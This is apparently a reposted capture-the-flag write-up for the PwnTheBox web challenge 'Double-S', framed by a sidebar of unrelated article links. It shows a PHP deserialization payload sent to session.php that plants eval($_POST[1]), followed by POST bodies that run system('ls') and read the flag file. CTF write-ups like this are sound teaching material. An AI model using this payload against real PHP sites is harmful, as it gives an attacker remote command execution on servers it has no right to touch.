当前位置:网站首页>PwnTheBox,Web:Double-S
PwnTheBox,Web:Double-S
2022-07-19 16:08:00 【Part 02】

There is no useful information in several common places
After scanning the directory

session.php There are loopholes in
Deserialization

Simple deserialization , Run out and pass it directly
GET
/session.php?aa=O:4:%22Anti%22:1:{s:4:%22info%22;s:16:%22eval($_POST[1]);%22;}
POST
1=phpinfo();
success

1=system('ls');

1=system('tac f1ag_i3_h3re');

边栏推荐
- Qt | 控件之QComboBox
- Advanced C language - struct implementation bit segment
- Mogdb/opengauss permission collation
- 我,35岁了。
- biji
- C语言之回调函数,qsort函数的定义及使用方法
- CoCon: A Self-Supervised Approach for Controlled Text Generation | ICLR 2021
- PwnTheBox,Web:Double-S
- 群里的初级工程师求助说,要采集采招数据,必须给他安排上
- Identity server 4 uses openid connect to add user authentication (3)
猜你喜欢

Next stop, embossed AI

几行代码,让黑白老照片重获新生!
![[dry goods] how much do you know about MySQL infrastructure design?](/img/d0/de3837588ce6cfc04556d186395612.png)
[dry goods] how much do you know about MySQL infrastructure design?

Case study on data management of low code building design company

初识convolution(卷积)+matlab对离散卷积过程的直观认识

一款强大的mock数据生成工具

First knowledge of convolution +matlab's intuitive understanding of discrete convolution process

ArkUI开发框架组件的生命周期详解

ArrayList源码解析一

在线SQL转文本工具
随机推荐
Open3d library installation, CONDA common instructions, importing open3d times this error solving environment: failed with initial frozen solve Retrying w
Online dice rolling dice tool
Identity server 4 uses openid connect to add user authentication (3)
Codeforce:b. mark the dust sweeper [fill 0 + move]
通过jmeter压测surging
安静的等待
ffifdyop绕过MD5进行sql注入
Learning notes of JUC source code 2 - AQS sharing and semaphore, countdownlatch
Woman Yelling At a Cat
Qt | 控件之QComboBox
阿米的思考
PwnTheBox,Web:Double-S
QT | qcombobox of control
MySQL series "trigger details"
Advanced C language - struct implementation bit segment
王者荣耀商城异地多活架构设计
[MCU simulation project] the nixie tube displays 0 to 5 in turn (Proteus schematic +keil code)
Online sql to text tool
【单片机仿真项目】LED 闪烁灯(proteus原理图+keil代码)
Stock financial information, board of directors, board of supervisors and other senior management information crawling